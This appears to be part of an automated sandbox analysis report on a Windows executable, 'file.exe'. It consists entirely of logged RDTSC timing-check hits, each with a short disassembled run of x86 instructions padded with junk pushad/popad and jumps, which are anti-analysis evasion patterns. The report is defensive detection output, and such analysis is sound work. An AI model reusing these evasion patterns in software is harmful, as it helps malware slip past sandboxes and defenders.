              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233B1D second address: 1233B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233C3E second address: 1233C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD8h 0x00000009 popad 0x0000000a jmp 00007EFFAC79DCCFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFFAC79DCD2h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233DBA second address: 1233DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F90h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233F22 second address: 1233F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007EFFAC79DCC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1233F2F second address: 1233F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007EFFACBF2F8Ah 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007EFFACBF2F92h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007EFFACBF2F8Dh 0x0000001d js 00007EFFACBF2F86h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B3C1 second address: 123B3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BCB9 second address: 123BCBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BCBF second address: 123BCD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCD4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123BCD7 second address: 123BCE2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123C2D9 second address: 123C2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD0h 0x00000009 popad 0x0000000a jo 00007EFFAC79DCCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123C878 second address: 123C88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFACBF2F8Fh 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123CB88 second address: 123CB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240BD0 second address: 1240BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240047 second address: 1240056 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007EFFAC79DCC6h 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240351 second address: 1240372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFACBF2F97h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240372 second address: 1240379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124063B second address: 1240646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1240646 second address: 124064A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124064A second address: 1240650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124BE4A second address: 124BE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCD3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124C3DF second address: 124C3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFFACBF2F86h 0x0000000a jl 00007EFFACBF2F86h 0x00000010 popad 0x00000011 pushad 0x00000012 je 00007EFFACBF2F86h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124C3FF second address: 124C41A instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFFAC79DCC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFAC79DCCDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D8F8 second address: 124D913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFFACBF2F86h 0x0000000a popad 0x0000000b jg 00007EFFACBF2F88h 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007EFFACBF2F96h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D913 second address: 124D93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCCAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFFAC79DCD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D93C second address: 124D946 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFFACBF2F86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D946 second address: 124D94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D94C second address: 124D954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124D954 second address: 124D958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124B872 second address: 124B876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 124B876 second address: 124B87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253B88 second address: 1253B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253B8C second address: 1253B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253B94 second address: 1253B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1253B9A second address: 1253BA9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1259EF0 second address: 1259EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B4FF second address: 125B51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFFAC79DCC6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007EFFAC79DCCBh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B51B second address: 125B51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125B51F second address: 125B54A instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFAC79DCD9h 0x00000011 jbe 00007EFFAC79DCC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12631B9 second address: 12631BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267113 second address: 126714A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD0h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFFAC79DCD3h 0x00000012 jmp 00007EFFAC79DCCCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266CE4 second address: 1266CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266CEC second address: 1266CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266CF0 second address: 1266CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266CF4 second address: 1266D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007EFFAC79DCC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1266D07 second address: 1266D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007EFFACBF2F88h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269EE0 second address: 1269EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007EFFAC79DCC6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1269EF1 second address: 1269EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127330A second address: 1273310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278FA5 second address: 1278FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278FA9 second address: 1278FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278FAF second address: 1278FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F8Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282D66 second address: 1282D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282D87 second address: 1282D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282D8B second address: 1282D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282D91 second address: 1282D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282D97 second address: 1282DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007EFFAC79DCC6h 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282EE7 second address: 1282EED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282EED second address: 1282F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007EFFAC79DCC6h 0x0000000f jne 00007EFFAC79DCC6h 0x00000015 popad 0x00000016 jmp 00007EFFAC79DCD6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007EFFAC79DCCCh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282F28 second address: 1282F33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007EFFACBF2F86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1283064 second address: 1283080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007EFFAC79DCCFh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12831EC second address: 12831FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007EFFACBF2F86h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128334F second address: 1283363 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFAC79DCC6h 0x00000008 js 00007EFFAC79DCC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1283363 second address: 1283369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1283369 second address: 128339E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFFAC79DCC6h 0x00000008 jmp 00007EFFAC79DCD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 popad 0x00000016 push ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a jnp 00007EFFAC79DCC6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12834DD second address: 12834E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007EFFACBF2F86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12834E8 second address: 12834F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFFAC79DCC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1284081 second address: 12840B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFFACBF2F92h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12840B0 second address: 128410B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007EFFAC79DCCEh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007EFFAC79DCD7h 0x0000001a popad 0x0000001b jmp 00007EFFAC79DCD8h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128410B second address: 1284110 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289B9A second address: 1289BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFAC79DCCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289BAA second address: 1289BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1297BCE second address: 1297BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007EFFAC79DCE3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A953F second address: 12A9558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F8Ch 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a je 00007EFFACBF2F86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A969E second address: 12A96A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C20E3 second address: 12C20FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007EFFACBF2F8Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C20FB second address: 12C20FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C20FF second address: 12C2109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFFACBF2F86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C227D second address: 12C2290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C2C1F second address: 12C2C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C2C28 second address: 12C2C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C2C2E second address: 12C2C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C70D4 second address: 12C7129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a ja 00007EFFAC79DCCCh 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007EFFAC79DCC8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c xor dword ptr [ebp+1244A89Eh], esi 0x00000032 call 00007EFFAC79DCC9h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7129 second address: 12C7133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFFACBF2F86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7133 second address: 12C7137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7137 second address: 12C7170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007EFFACBF2F8Eh 0x0000000f jmp 00007EFFACBF2F97h 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7170 second address: 12C7174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C7174 second address: 12C7178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C884C second address: 12C8869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFFAC79DCD7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0329 second address: 52B0355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B0355 second address: 52B03B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007EFFAC79DCD1h 0x00000008 pop esi 0x00000009 push ebx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007EFFAC79DCD3h 0x00000014 mov ebp, esp 0x00000016 jmp 00007EFFAC79DCD6h 0x0000001b mov edx, dword ptr [ebp+0Ch] 0x0000001e jmp 00007EFFAC79DCD0h 0x00000023 mov ecx, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03D0 second address: 52B03D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03D6 second address: 52B03EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03EF second address: 52B03F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52B03F3 second address: 52B03F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
